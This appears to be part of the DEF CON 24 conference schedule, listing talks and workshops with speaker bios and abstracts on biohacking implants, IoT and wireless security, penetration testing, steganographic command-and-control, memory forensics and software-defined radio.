Through sharing experiences learned first hand and through work on the Dangerous Minds Podcast, c00p3r will be introducing you to implantable technology, explaining the basic products that are available on the market now, from where, as well as provide a show and tell experience of what it is like to become one of the augmentives. Come to learn, and stay to laugh and become a part of this new world of cyborgs.
Return to Index
BHV - Skyview 4 - Friday - 13:30-13:59
Speaker: c00p3r
About c00p3r:
c00p3r is the founder of dangerousminds.io a biohacking. grinding, implantable tech, and network security podcast that started in late sept 2016 , a sysadmin that lives open source solutions by trade, and also pr director and member of the board of directors for prophase biostudios located in austin texas.
Abstract:
Through sharing experiences learned first hand and through work on the Dangerous Minds Podcast, c00p3r will be introducing you to implantable technology, explaining the basic products that are available on the market now, from where, as well as provide a show and tell experience of what it is like to become one of the augmentives. Come to learn, and stay to laugh and become a part of this new world of cyborgs.
Return to Index
BHV - Skyview 4 - Friday - 11:30-11:59
Speaker: Amal Graafstra
@amal
dangerousthings.com
About Amal:
Adventure technologist and biohacker Amal Graafstra has always been interested in technology. In 2005 he became the world’s first double RFID implantee. Amal had two small RFID transponders implanted, one into each hand, and he still uses them to open doors, start his vehicles, and log into his computer. Since implanting himself, he’s written a book called RFID Toys, become a TEDx speaker, appeared on a multitude of television programs, and been the subject of various documentaries. He's also started a biohacking company called Dangerous Things which developed the world’s first and only NFC compliant implantable transponder. He continues to explore biohacking and transhumanism while developing next generation implantable technologies.
Abstract:
Abstract pending.
Return to Index
BHV - Skyview 4 - Saturday - 11:30-11:59
Speaker: Amal Graafstra
@amal
dangerousthings.com
About Amal Graafstra:
Adventure technologist and biohacker Amal Graafstra has always been interested in technology. In 2005 he became the world’s first double RFID implantee. Amal had two small RFID transponders implanted, one into each hand, and he still uses them to open doors, start his vehicles, and log into his computer. Since implanting himself, he’s written a book called RFID Toys, become a TEDx speaker, appeared on a multitude of television programs, and been the subject of various documentaries. He's also started a biohacking company called Dangerous Things which developed the world’s first and only NFC compliant implantable transponder. He continues to explore biohacking and transhumanism while developing next generation implantable technologies.
Abstract:
Abstract pending.
Return to Index
BHV - Skyview 4 - Sunday - 11:30-11:59
Speaker: Amal Graafstra
@amal
dangerousthings.com
About Amal:
Adventure technologist and biohacker Amal Graafstra has always been interested in technology. In 2005 he became the world’s first double RFID implantee. Amal had two small RFID transponders implanted, one into each hand, and he still uses them to open doors, start his vehicles, and log into his computer. Since implanting himself, he’s written a book called RFID Toys, become a TEDx speaker, appeared on a multitude of television programs, and been the subject of various documentaries. He's also started a biohacking company called Dangerous Things which developed the world’s first and only NFC compliant implantable transponder. He continues to explore biohacking and transhumanism while developing next generation implantable technologies.
Abstract:
Abstract pending.
Return to Index
WOS - Skyview 6 - Sunday - 13:10-13:59
Incident Code Name: When SkyFalls A Shaken, Not Stirred, James Bond Tale on Incident Response
Plug, Security Operations and DFIR at Verizon Digital Media Services
The headlines shout the latest exploits of rogue actors and nation states. The hunters, cloaked in anonymity, strike without warning, devouring Intellectual Property and destroying corporate reputations. Potential victims cower in Fear, Uncertainty and Doubt, hoping they can hide in plain view. But can we learn from the hunters strategies to mount an effective defense? In this talk we'll take a look at events that took place on the James Bond film Skyfall. We will look at the film from the Incident Response point of view, and analyze the events and actions that took place in the film with comparisons of real life examples. Finally, we'll create a profile of the "evil" characters in the film along with James Bond and the team behind him at MI6. What team member would you be? Q, the weapons geek? Moneypenny, sidekick and junior field agent? M, the shrewd manager? Or James Bond, the tip of the spear, utilizing multiple strategies and tools to defeat his opponents.
Plug (Twitter: @plugxor) is currently a Senior Security Analyst at Verizon Digital Media Services (EdgeCast Networks). He started his journey in computer security back in 1996 when he discovered a 2600 magazine that eventually that lead him to his first LA2600 meeting in 1998. From that point forward he has been involved in computer security. With over 16 years of IT experience, he has worked as Systems Administrator, Security Analyst and Security Engineer in the Finance and Telecom sector. In his free time he enjoys building Legos, playing with synthesizers and modular systems, when possible he volunteers his time to computer security events.
Return to Index
CPV - Bronze 2 - Friday - 15:00-15:30
Talk Title:
Instegogram: Exploiting Instagram for C2 via Image Steganography
Speaker Name, Employer or position:
Amanda Rousseau, Hyrum Anderson, & Daniel Grant - R&D at Endgame
Abstract:
Exploiting social media sites for command-and-control (C2) has been growing in popularity in the past few years. But both Good and Bad guys have privacy concerns about their communication methods. Discoverable encryption may not always be the answer. By using image stenography we hide command-and-control messages in plain sight within digital images posted to the social media site Instagram. In this presentation, we will demo Instegogram as well as discuss how to detect and prevent it.
Bio:
Amanda absolutely loves malware. She works as a Malware Researcher at Endgame who focuses on dynamic behavior detection both on Windows and OSX platforms.
Hyrum Anderson is a data scientist at Endgame who researches problems in adversarial machine learning and deploys solutions for large scale malware classification. He received a PhD in signal processing and machine learning from the University of Washington.
Daniel Grant is a data scientist at Endgame focusing on behavioral analysis and anomaly detection. He received a MS in Operations Research from Georgia Tech and likes building things that find bad guys when they are being sneaky.
Social media links if provided:
@_Amanda_33, @drhyrum
Return to Index
Wireless - Skyview 1 - Saturday - 12:30-12:50
Caleb Mays
Bio
Caleb Mays is an academic researcher in wireless security with a focus on Insteon home automation networks and their enigmatic, proprietary protocol. He has been a network security professional for five years with experience in computer programming, enterprise network administration, and communications planning.
Ben Ramsey
Bio
Ben Ramsey, PhD, CISSP, has over a decade of experience in network security research. His work focuses on critical infrastructure protection and low power wireless protocols, such as ZigBee, Z-Wave, Bluetooth Low Energy, and Insteon. He has published in several academic journals and has presented research at multiple conferences, including GLOBECOM, MILCOM, SenseApp, and ShmooCon.
Insteon, Inste-off, Inste-open?
Abstract
Insteon home automation devices communicate via proprietary protocols riding over powerlines and sub-gigahertz RF. While Insteon has been making homes smarter for a decade, reverse engineering of the protocol by security professionals has only recently begun.? At DEF CON 23 Peter Shipley reverse engineered much of the Insteon wireless protocol, demonstrated that Insteon's public whitepaper was largely bogus, and that there was no evidence of network security.
We agree with Joshua Wright that ""Security does not improve until tools for practical exploration of the attack surface become available,"" so we set out to build such tools for Insteon. In this presentation we'll show how Shipley got it (mostly) right about the Insteon protocol, while also showing off significantly more advanced tools for sniffing and traffic injection. These tools include a powerful Wireshark dissector and a network scanner/enumerator.
|
Return to Index
IOT - Bronze 4 - Saturday - 15:30-16:10
Internet of Thieves (or DIY Persistence)
Joseph Needleman
Ever want your very own pwnlight, pwnpot, or pwntoaster?
Sure those are silly names, but in this world of embedded devices and development, let's try something different. We will be focusing on taking those fun, innocuous devices that are making people's lives smarter and turning them into our own useful embedded [attack] platforms. We will be covering what devices work best for different situations, when and where and what to embed, and provide ways of building out persistence directly on your new pwning platform.
Joe is a security researcher who loves to experiment with embedded devices, signals, and really anything with electrical signals. He lives in a server room and would love to be let out from time to time. When not stuck in a server room or being electrocuted he also dabbles with cloud research.
Return to Index
BHV - Skyview 4 - Saturday - 17:00-17:59
Speaker: NeuroTechX
@sciencelaer
@NeuroTechX
About Sydney Swaine-Simon:
Sydney Swaine-Simon was born and raised in Montreal, Canada. He has a strong passion for technology, innovation and the human mind which led to him co-founding NeurotechX, an NPO whose goal is to educate and grow the field of Neurotechnology.
About Melanie Segado:
Melanie really likes brains and computers. This is why she co-founded NeuroTechX, an NPO whose mission is to grow the global neurotechnology community. She is currently pursuing a PhD in cognitive neuroscience. Melanie spends her free time hacking on brain technology and thinking about its societal implications.
Abstract:
Brain based authentication is an emerging field that seeks to use brain signals as a form of biometric authentication. Due to the increased availability and decreased cost of portable electroencephalography (EEG) devices, which can record brain activity from the scalp surface, this technique has gained popularity in research and in the media. In this talk we will explain the science underlying brain based authentication, the advantages and limitations of this technique, and give a live demo of a brain based authentication prototype.
Return to Index
Workshops - Las Vegas Ballroom 2 - Thursday - 10:00-14:00
Intro to Memory Forensics With Volatility
Miguel Antonio Guirao Aguilera Security Consultant, Futura - Open Solutions
Introduction to Memory Forensics with Volatility is a workshop for those who do not have a clue about forensics, memory forensics or the Volatility Framework. In order to get the most out of this workshop, you should feel comfortable using the command line interface (either Linux/Mac). I order to get a preview of the tool we will be using, visit http://www.volatilityfoundation.org/.
In this workshop, you will learn about memory forensics and how this is performed with one of the best open source frameworks for memory forensics, The Volatility Framework. You will learn how to analyze a memory image or dump, and look for artifacts that enable you, the forensics analyst, to rebuild the digital crime scene and to answer questions as to why, how and when.
You will learn to:
- Identify rogue process in memory, maybe from malware or backdoors.
- Get details about these process. When they were started, by whom, additional info.
- Network connections. From where, at what time, what they launched, etc.
- Files opened. With which user, link them with processes.
- Find out the command history, in either Linux or Windows.
- Check for Signs of a Rootkit
- Analyze Process DLLs and Handles
- Dump Suspicious Processes and Drivers
Miguel Guirao (aka Chicolinux) has been in the information security industry for around ten years, he is a freelance consultant at Futura - Open Solutions, where he also has been training professionals about Linux Management, Information Security and Programming. He has been also a professor since 2009 for the Anahuac Mayab University where he teaches at the School of CS Engineering and at the School of Multimedia Design. He teaches Information Security in the Master of Information Technology Management.
Max Class Size: 55
Prerequisites for students: Students must feel comfortable using the CLI (Command Line Interface). Knowledge of the basic commands in Linux, like ls, cd, relative & absolute path, ps, and so on.
Materials or Equipment students will need to bring to participate: Although the Volatility tool is also available to the Windows OS, in order to get it’s full power we will be using GNU/Linux/UNIX so, either install it on your laptop or create a VM with your favorite virtualization software. Volatility requires Python so, in order to save time and get into what really matters, come with your OS fully loaded with the tool and all it’s prerequisites. More info at http://www.volatilityfoundation.org/
Return to Index
CPV - Bronze 2 - Friday - 15:30-16:00
Talk Title:
Introducing Man In The Contacts attack to trick encrypted messaging apps
Speaker Name, Employer or position:
Jrmy Matos - Software Security Expert at SecuringApps
Abstract:
Mobile messaging applications have recently switched to end-to-end encryption. With debates at the government level to ask for backdoors, those tools are perceived as unbreakable. Yet, most of the implementations trust the contact information stored in the smartphone. Given that end-users hardly know a few phone numbers and that modifying contacts is easy, we will introduce a new type of attack: Man In The Contacts (MITC). Without studying any cryptography, we will examine how WhatsApp, Telegram and Signal behave when an Android application is tampering with the contacts in background. For some scenarios, the end-user can be fooled in talking to the wrong person and a MITM proxy can be implemented. Finally, we will discuss about countermeasures both at the technical and usability levels.
Bio:
Jeremy Matos has been working in building secure software over the last 10 years. With an initial academic background as a developer, he was involved in designing and implementing a two-factor authentication product with challenging threat models, particularly when delivering a public mobile application. As a consultant he helped in the security requirements definition and implementation, including cryptographic protocols, for applications where the insider is the enemy. He also led code reviews and security validation activities for companies exposed to reputation damage. In addition, he participated in research projects to mitigate Man-In-The-Browser and Man-In-The-Mobile attacks.
Social media links if provided:
@SecuringApps
Return to Index
Wireless - Skyview 1 - Friday - 13:00-13:50
Brian Butterly
Bio
Brian is a security researcher, analyst and simply a hacker at Heidelberg (Germany) based ERNW GmbH. Coming from the field of electronic engineering he tends to choose alternate approaches when hitting new projects. He currently works on the intersection of embedded-, mobile and telco-security, with tasks and research ranging from evaluating apps and devices through to analyzing their transport networks and backend infrastructures. Resulting from the broad range of practical experience and natural curiosity he has developed a very diverse set of skills and knowledge. He enjoys cracking open black boxes and learning about their details down to the electronic circuits and creating the tools he needs on the way. He is always happy to share his knowledge and findings.
@BadgeWizard
Stefan Kiese
Bio
Stefan works as a security researcher and analyst at ERNW and has extensive experience in hardware security. Through his former work he has background in SCADA and R&D of embedded systems. His personal main areas of interest are embedded systems, the IoT and of course their security issues.
Introducing the HackMeRF
Abstract
"During the past few years the IM-ME has gained quite some interest throughout the Hacker community. Initially designed and sold as a hardware chat toy/client for girls it consists of a simple display, QWERTY keyboard and a Sub-GHz RF enabled TI SoC (CC1110) with a 8051 controller. As the controller turned out to be re-programmable, various RF tools like spectrum analyzers and garage door bruteforcers have been implemented on just this platform. Sadly the device is becoming very rare, is slow and lacks memory for larger projects.
In preperation for our home conference we decided to tribute the IM-ME by re-animating it as a conference badge based on TI's CC1310. Using the ARM Cortex M3 based SoC and a touch display we've created a sound successor - the HackMeRF.
In our talk we will introduce the HackMeRF as an OpenHardware and OpenSource platform for RF hackers, researchers and developers. It will start with an overview of the IM-ME, as our inspiration, and further RF projects, which are currently available. Then, after covering the HackMeRF's development process and challenges, we will give a detailed insight into its components and hardware design. We will then present our current code base and show a few quick examples on how to implement protocols and get the device to talk. And, of course, we will show the actual device and present our current hardware design.
As we want to make the HackMeRF available to everybody, we'd love to collect some feedback, ideas and further inspiration from the audience!
-----------------------------
Some further technical information on the device can be found here: https://www.insinuator.net/2016/03/troopers-16-taking-the-badge-to-yet-another-level/
Our Website is sadly not quite finished, yet"
|
Return to Index
DEFCON - Track Three - Friday - 10:00-10:59
Introduction the Wichcraft Compiler Collection : Towards Universal Code Theft
Jonathan Brossard (endrazine) Master of Darkness, MOABI.com
With this presentation, we take a new approach to reverse engineering. Instead of attempting to decompile code, we seek to undo the work of the linker and produce relocatable files, the typical output of a compiler. The main benefit of the later technique over the former being that it does work. Once achieved universal code ‘reuse’ by relinking those relocatable objects as arbitrary shared libraries, we'll create a form of binary reflection, add scripting capabilities and in memory debugging using a JIT compiler, to attain automated API prototyping and annotation, which, we will argue, constitutes a primary form of binary code self awareness. Finally, we'll see how abusing the dynamic linker internals shall elegantly solve a number of complex tasks for us, such as calling a given function within a binary without having to craft a valid input to reach it.
The applications in terms of vulnerability exploitation, functional testing, static analysis validation and more generally computer wizardry being tremendous, we'll have fun demoing some new exploits in real life applications, and commit public program profanity, such as turing PEs into ELFs, functional scripting of sshd in memory, stealing crypto routines without even disassembling them, among other things that were never supposed to work. All the above techniques have been implemented into the Wichcraft Compiler Collection, to be released as proper open source software (MIT/BSD-2 licenses) exclusively at DEF CON 24.
Jonathan Brossard is a computer whisperer from France, although he's been living in Brazil, India, Australia and now lives in San Francisco. For his first conference at DEF CON 16, he hacked Microsoft Bitlocker, McAffee Endpoint and a fair number of BIOS Firmwares. During his second presentation at DEF CON 20, he presented Rakshasa, a BIOS malware based on open source software, the MIT Technology review labeled &lquo;incurable and undetectable&rquo;.
This year will be his third DEF CON ... Endrazine is also known in the community for having run the Hackito Ergo Sum and NoSuchCon conferences in France, participating to the Shakacon Program Committee in Hawaii, and authoring a number of exploits over the past decade. Including the first remote Windows 10 exploit and several hardcore reverse engineering tools and whitepapers. Jonathan is part of the team behind MOABI.COM, and acts as the Principal Engineer of Product Security at Salesforce.
Twitter: @endrazine
Facebook: toucansystem
https://moabi.com
Return to Index
Workshops - Las Vegas Ballroom 6 - Friday - 10:00-14:00
Introduction to Penetration Testing with Metasploit
Georgia Weidman CEO & Founder, Shevirah
This class will be conducted using Kali Linux against Windows and Linux target virtual machines. Students will become familiar with the phases of the Penetration Testing Execution Standard (PTES) and the common tools of the trade such as Metasploit, Nmap, Nessus, Maltego and others. Beginning with using Kali Linux and the Metasploit Framework, this course will then simulate each phase of penetration testing with the target virtual machines. Students will learn how to gather information about a target organization using open source reconnaissance, discover and verify vulnerabilities on targets, and use tools, public exploits, and manual techniques to exploit issues. In post exploitation we will gather information, pivot onto additional networks, perform privilege escalation, etc. Due to the short time this course is a great kick starter into completing additional material on penetration testing including an additional penetration testing target from the instructors book and an online lab of additional targets of varying difficulty which will be made available to students at the end of the course.
Shevirah founder and CEO Georgia Weidman is a serial entrepreneur, penetration tester, security researcher, speaker, trainer, and author. She holds a MS in computer science as well as holding CISSP, CEH, and OSCP certifications. Her work in the field of smartphone exploitation has been featured internationally in print and on television. She has spoken on her research at venues such as the NSA, West Point, and top security conferences. She has provided technical training such as exploit development and penetration testing at conferences such as Blackhat USA, Brucon, and CanSecWest. Georgia founded Bulb Security LLC, a security consulting firm specializing in security assessments/penetration testing, security training, and research/development. She was awarded a DARPA Cyber Fast Track grant to continue her work in mobile device security culminating in the release of the open source project the Smartphone Pentest Framework (SPF). She founded Shevirah Inc. to create product solutions for assessing and managing the risk of mobile devices in the enterprise and testing the effectiveness of enterprise mobility management solutions and is a graduate of the Mach37 cybersecurity accelerator. She is the author of Penetration Testing: A Hands-On Introduction to Hacking from No Starch Press, “On edge graceful labelings of disjoint unions of 2r-regular edge graceful graphs” in the Journal of the Institute of Combinatorics and its Applications, and the principal investigator on pending patent "METHOD AND SYSTEM FOR ASSESSING DATA SECURITY". She was the recipient of the 2015 Women’s Society of CyberJutsu Pentest Ninja award. She is on the board of advisors of the angel backed security training startup Cybrary and the nonprofit Digital Citizens Alliance.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate:
If students wish to follow along hands on materials to be downloaded will be made available online a week before the course. Since this is first come first serve people who do not make it into the workshop may of course download the materials and work through my book with them if they so choose. Additional targets and exercises will be available for after class, so even those who prefer to watch and listen during class are encouraged to download the materials for practice later.
Return to Index
Workshops - Las Vegas Ballroom 5 - Friday - 10:00-14:00
Introduction to x86 disassembly
Dazzle Cat Duo Security Engineers
Jumping into the world of disassembly can be incredibly intimidating and quite painful. This talk aims to introduce disassembly by walking through how to recognize basic logic flows and data structures in assembly. We’ll look at locating common flow controllers such as if/else/loops/switch cases, as well as memory access and data structures. The talk will specifically address static disassembly using IDA, looking at c compiled to x86_32, but the principles can be applied to any other language and assembly architecture. x86, is one of the most common assembly architectures, and incredibly useful for security engineers to understand. x86 is the assembly architecture running almost all Mac, Windows, and Linux computers.
The Dazzle Cat Duo are both security engineers who specialize in x86. In addition both serve as adjunct faculty members where they teach C and x86 .
Max Class Size: 55
Prerequisites for students: Students must have a basic coding knowledge, and understand what if/else/loops/switches logically do, in any coding language.
Materials or Equipment students will need to bring to participate: Please bring a laptop with Virtual Box (latest version) and at least 20 gigs of free disk space. VM's with examples and tools will be distributed in class via USB sticks.
Return to Index
Workshops - Las Vegas Ballroom 6 - Thursday - 15:00-19:00
Intrusion Prevention System (IPS) Evasion Techniques
Thomas Wilhelm
John Spearing Co-founder and Operations Manager, Crystal Defense Network Information Security
In most professional penetration tests, the pentester is given unrestricted, unfettered access to a network. However, this does not provide an effective evaluation of all preventative measures available to an organization that prevent and identify ongoing attacks. As a result, more businesses now require pentesters to confront Intrusion Detection / Prevention Systems aimed at limiting attacks in their network. The ability to understand how IDS/IPS systems work and effective techniques to circumvent their efforts to restrict your activities within the network is becoming essential for pentesters.
In this workshop, we will build an IPS system and examine their inherent limitations. We will then perform attacks within a test lab environment to see how effective the IPS is against our typical attacks. Once we understand how IPS systems limit our ability to pentest, we will then look at ways to exploit IPS limitations to be more effective in our professional penetration tests.
Thomas Wilhelm has been an associate professor at an NSACAE university, who has taught information assurance for many years at both the masters and undergraduate level. He has been a penetration tester and team lead for fortune 100 companies, and spent the last 20+ years involved in information security.
Thomas has written and authored numerous articles and books over the years on hacking; the latest is titled “Professional Penetration Testing (vol 2),” published by Syngress, which has been printed in multiple languages. Thomas holds two masters degrees (MSCS, MSM) and maintains the following certifications: ISSMP, CISSP, CCNP Security, SCSECA, SCNA, SCSA, IEM, IAM.
John Spearing works in the field of network and physical security, and has obtained a Masters Degree in both Computer Science and Organizational Behavior. John is the co-founder and Operations Manager of the MSSP company known as Crystal Defense Network Information Security, located in central Colorado. John's specialty within the Information Security realm is centralized around network intrusion detection and prevention, as well as endpoint security.
Max Class Size: 55
Prerequisites for students: Students should already be familiar with penetration testing techniques and tools (and their flags). The use of proxies will be required to participate, so knowledge of how to configure your hacking platform to intercept and ability to modify packets is essential.
Materials or Equipment students will need to bring to participate: Since this is an advanced penetration testing subject, participants should have a laptop with the ability to host virtual images, which also contains an up to date Kali Linux image. In addition, if they want to participate in actual attacks within the lab, they should bring CAT5 cables for connectivity. This class will not spend time getting students online - participants should already be familiar with configuring static IP addresses and/or DHCP for their systems. Because participants will be able to connect to a lab environment with active exploits, it is suggested that students use a computer system that can be easily re-imaged at the end of the workshop.
Return to Index
IOT - Bronze 1 - Sunday - 11:00-11:50
IoT Defenses - Software, Hardware, Wireless and Cloud
Aaron Guzman, Principal Penetration Tester
The vast playground of IoT, and all its problems, will surely transfer from Consumer homes over to the Enterprise. Various studies have shown the effect of consumer IoT adoption in the enterprise, resulting in rouge connections into a trusted network. Items such as Smart TVs, drones, home security devices, and even connected vehicles are now being discovered in corporate networks. Industry professionals and board rooms are struggling to keep up with the growth of IoT due to the various interfaces introduced. We will discuss the many IoT attack surfaces and provide proactive security controls that are easily implemented by consumers, enterprises, and manufactures alike.
What is constantly being shared throughout the industry is how IoT is broken, vulnerable, and insecure. Various testing methodologies and guidance cheat sheets have been released without discussions on how to protect against the threats discovered. As a technical editor for an upcoming IoT security book, as well as a contributor for various security guidance documents on IoT, this talk will give practical defense guidance that attendees and manufacturers can implement.
Aaron is a Principal Penetration Tester in the Los Angeles area with expertise in Application Security, IoT, Mobile, Web, and Network Penetration testing. He volunteers his time as a Chapter Board Member for the OWASP Los Angeles, President for Cloud Security Alliance SoCal, and a Technical Editor for Packt Publishing . Aaron is a contributor for various IoT guidance documents from CSA, OWASP, Prpl, and others. He has held roles with companies such as Belkin, Linksys, Dell and Symantec.
Social media links if provided.
@scriptingxss
Return to Index
BHV - Skyview 4 - Saturday - 13:30-13:59
Speaker: RenderMan
About RenderMan:
Canadian born and raised. He hacks banks during the day and other random things at night (currently sex toys). His interests are very diverse and people seem to like to hear about his work as much as he enjoys sharing it. This has allowed him to speak at conferences and events all over the world and even change it a few times.
Often near infosec news or causing it himself, he can be found on twitter at @ihackedwhat and @internetofdongs
Abstract:
Among ‘Internet of Things’ security research, there is one branch that no one has wanted to touch, until now: The Internet of Dongs. Internet connected sex toys in all shapes, sizes and capabilities are available on the market with many more being developed. Like many IoT devices, IoD devices suffer a great many security and privacy vulnerabilities. These issues are all the more important when you consider the private and intimate nature of these devices. To research this, the Internet of Dongs project was founded (https://internetofdon.gs).
This talk will explore this under researched branch of IoT and the security and privacy threats that exist. It will also cover the IoD projects efforts to bring information security best practices to the adult toy industry.
Return to Index
BHV - Skyview 4 - Saturday - 13:30-13:59
Speaker: RenderMan
About RenderMan:
Canadian born and raised. He hacks banks during the day and other random things at night (currently sex toys). His interests are very diverse and people seem to like to hear about his work as much as he enjoys sharing it. This has allowed him to speak at conferences and events all over the world and even change it a few times.
Often near infosec news or causing it himself, he can be found on twitter at @ihackedwhat and @internetofdongs
Abstract:
Among ‘Internet of Things’ security research, there is one branch that no one has wanted to touch, until now: The Internet of Dongs. Internet connected sex toys in all shapes, sizes and capabilities are available on the market with many more being developed. Like many IoT devices, IoD devices suffer a great many security and privacy vulnerabilities. These issues are all the more important when you consider the private and intimate nature of these devices. To research this, the Internet of Dongs project was founded (https://internetofdon.gs).
This talk will explore this under researched branch of IoT and the security and privacy threats that exist. It will also cover the IoD projects efforts to bring information security best practices to the adult toy industry.
Return to Index
IOT - Bronze 1 - Friday - 16:00-16:50
Is Your Internet Light On? Protecting Consumers in the Age of Connected Everything
Terrell McSweeny, Federal Trade Commission, Commissioner
Learn about the FTCs efforts to push for improvements in IoT security, including our law enforcement actions challenging inadequate data security in devices like webcams and routers, upcoming workshops on emerging technology issues including drones and smart TVs, our Start with Security business education initiative, and the expansion of the agencys in-house research and investigation capabilities. In January 2015 the FTC issued a report on the IoT, finding a troubling lack of security in many IoT products. Well provide an update on the agencys and policy activities since then, tips for how to bring issues to the FTCs attention, and a review of some of the challenges that remain.
Terrell McSweeny is a Commissioner of the Federal Trade Commission and this is her third time at DEF CON. When it comes to tech issues, Commissioner McSweeny has focused on the valuable role researchers and hackers can play protecting consumer data security and privacy. She opposes bad policy and legislative proposals like mandatory backdoors and the criminalization of hacking. She believes that enforcers like the FTC should work with the researcher community to protect consumers.
Joe Calandrino, PhD is the Research Director of the Federal Trade Commissions Office of Technology Research and Investigation. With a PhD in computer science focused on security and privacy from Princeton, Dr. Calandrino is personally motivated to see the work and views of the security community drive educated government action and policy. From personal experience uncovering vulnerabilities in voting machine source code, contributing to the cold-boot attack on disk encryption (for which he won a prestigious Pwnie Award!), or revealing ways that recommendations can leak information, he has seen how security research can teach valuable lessons and make us safer. His goals at the FTC include continuing to build both its internal technical expertise and its bonds with the larger security community.
@TMcSweenyFTC
Return to Index
Wireless - Skyview 1 - Saturday - 14:30-14:50
abraxas3d
Bio
I enjoy thinking and doing. Not necessarily in that order. Book learning: BSEET, BSCET, MSEE, math minor. Actual doing: Engineer, Extra Class Ham, Radio Club Trustee, Phase 4 Ground Lead, Organ Donor (AI Pipe Organ) Lead, Sol Diego (Burning Man) Director, San Diego CORE Critter Lead, DEFCON 2, 4, 7, 11, 13, 17, 18, 21, 22, 23.
@abraxas3d
Skunkworks
Bio
"
Starting with an amateur radio license in 1977 and a B.S.E.E. from Rice University in 1983.5, Paul relocated to San Diego to join Linkabit, and eventually Qualcomm, where he participated in early hardware, software, and standards development for CDMA cellular systems. He's been active with amateur satellites since the telemetry was sent in Morse code, and helped build the first batch of microsats with digital payloads. He'd like to help drag amateur satellites into the new millennium."
@mustbeart
It's Just Software, right?
Abstract
We live in a golden age. We have numerous options for innovative and
inexpensive software-defined radio, a myriad of embedded processors, a
variety of powerful development environments, and plentiful and cheap
general-purpose processors. Data ubiquity has revolutionized personal and
professional communications. Everyone has a cell phone and digital
communications have triumphed over all. Communications is a solved problem!
Well, hold the phone. While many frequency bands have plenty of hardware,
software, and firmware choices, there are many exceptions. Amateur radio
microwave bands are still dominated by bespoke rigs producing narrowband
analog voice and CW. Activity is mainly during contests, with beacons
holding down the spectral fort for the long months between events. We are
working very hard to change this situation in a fundamentally positive way.
AMSATs next generation of digital microwave satellites is moving firmly
into the 5GHz/10GHz bands. This is where the bandwidth is at, this is where
the current professional interest lies, and this is where we must become
competent designers and more plentiful operators.
In order to operate, radios must exist. Buying inexpensive off-the-shelf
equipment to work these new digital satellites is not an option for the
microwave bands. We believe that we must provide solutions for radios for
the satellite service, otherwise these satellites will simply not be used.
These solutions must include instructions on how to build rigs from
scratch, instructions on how to build up rigs from existing components and
radio gear, and a quality manufactured solution that can also be used for
emergency communications services.
The amateur satellite service alone may not justify the expense and effort
required to design and build a new radio system. But, this is the age of
software-defined radio. Since the selected waveforms for AMSAT digital
satellites and the waveforms for terrestrial digital television are from
the same family of standards, we have a wonderful opportunity to make a
radio that will do both space and ground. This opens up both amateur
terrestrial and amateur space markets.
But were not done yet. If intelligently designed, this radio is also
microwave band test equipment, providing yet another market. Phase 4 Ground
exists to make this radio a reality. Come listen to what Phase 4 Ground
Team has done so far to design this radio, and where we are going next!
Return to Index
DEFCON - Track One - Saturday - 11:00-11:59
Jittery MacGyver: Lessons Learned from Building a Bionic Hand out of a Coffee Maker
Evan Booth Engineer
In May of 2015, it was estimated that a pod-based coffee maker could be found in nearly one in three American homes. Despite the continued popularity of these single-cup coffee conjurers at home as well as in the workplace, it has become clear that these devices are not impervious to mechanical and/or electrical failure. It was this intersection of extremely prevalent hardware and relatively short lifespan that prompted me to begin exploring the upper limits of what could be created by repurposing one of the most popular pod-based machines: the Keurig. In this session, we will walk through some real-world examples of ‘MacGyver’-style creative problem-solving, we'll go hands on (yes, pun intended) with stuff made from repurposed Keurigs, and finally, I'll reflect on lessons learned from looking for potential in things most people deem common and unremarkable.
Evan Booth Evan Booth loves to build stuff out of other stuff, he tends to break things for curiosity's sake. Throughout 2013 and into 2014, in an effort to highlight hypocrisy and "security theater" brought about by the TSA, through a research project called "Terminal Cornucopia," Evan created an arsenal ranging from simple, melee weapons to reloadable firearms to remotely-trigger incendiary suitcases—all solely comprised of items that anyone can purchase inside most airport terminals *after* the security checkpoint.
Given the right ingredients, a big cardboard box can be a time machine, spaceship, minecart, or a telephone booth that only calls people named "Steve" who live in the future.
Twitter: @evanbooth
Return to Index
CPV - Bronze 2 - Saturday - 11:00-11:30
Talk Title:
JWTs in a flash!
Speaker Name, Employer or position:
Evan Johnson (ejcx_) - Security Systems Engineer at CloudFlare
Abstract:
The new(ish) JOSE standard is growing rapidly in popularity. Many people are excited to adopt the new standard and use it to build interesting and new things with JWT! Let's get everyone up to speed on JWT's, talk about the do's and don't regarding JWTs, review some JWT uses, and use JWT's effectively.
Bio:
Evan Johnson is a security systems engineer at CloudFlare. He loves breaking things and can distinguish diet pepsi from diet coke by taste.
Social media links if provided:
@ejcx_
Return to Index
Wireless - Skyview 1 - Friday - 16:00-17:50
Balint Seeber
Bio
A software engineer by training, Balint "a bit too early" Seeber is a
perpetual hacker, the Director of Vulnerability Research at Bastille
Networks and the guy behind spench.net. His passion is Software Defined
Radio, sharing secrets, and discovering all that can be decoded from the
ether, as well as extracting interesting information from lesser-known
data sources (sometimes with pliers and a blow torch) and visualizing
them in novel ways, such as interpretive dance. When not receiving electromagnetic radiation, or
praise from his twitter followers, he likes to develop interactive web
apps for presenting spatial data or the Wireless Village schedule.
Originally from "Down Under", he moved out of the morlock caves in 2012
to pursue his love of SDR as the Applications Specialist and SDR
Evangelist at Ettus Research. This bio was definitely not edited as
punishment for releasing the Wireless Village schedule early on twitter.
@spenchdotnet
Kickin' It Old Skool: SDR for Ye Olde Signals
Abstract
"Software Defined Radio is a wonderful tool for experimenting and decoding modern-day digital signals, but what about the pre-digital days? Transmitting audio using analog modulation techniques is still common (e.g. broadcast FM, AM, HAM bands, trunked radio networks), but what about more complex signals?
Terrestrial digital television (ATSC & DVB-T) has replaced the old NTSC/PAL/SECAM channels we were used to, but NTSC has made an interesting comeback in First Person Video links for drones (digital solutions are becoming more popular, but latency has to be kept very low). GNU Radio can be used to develop a prototype NTSC demodulator for viewing these FPV links. Its back to the old world of interlacing and the back porch! Ill describe how a NTSC signal is constructed, and interactively demonstrate how to build a simple flowgraph to display video frames. If you have an FPV system, please bring it along so we can capture another source!
Another analog signal still very much in use, which does not transmit your traditional idea of information, is RADAR. One type is Frequency Modulated Continuous Wave (FMCW). It is an intuitively simple waveform, and has some great properties for seeing whats out there (for example, it is all over the HF band). GNU Radio can be used to synthesise and process FMCW signals. Ill show why FMCW works, demonstrate signal processing with offline tools, and construct some simple flowgraphs to do it real-time with GNU Radio.
If theres time, Ill preview some other SDR experiments, such a decoder for the downlink path of the INMARSAT Aero aviation satellite service, and a spot jammer."
|
Return to Index
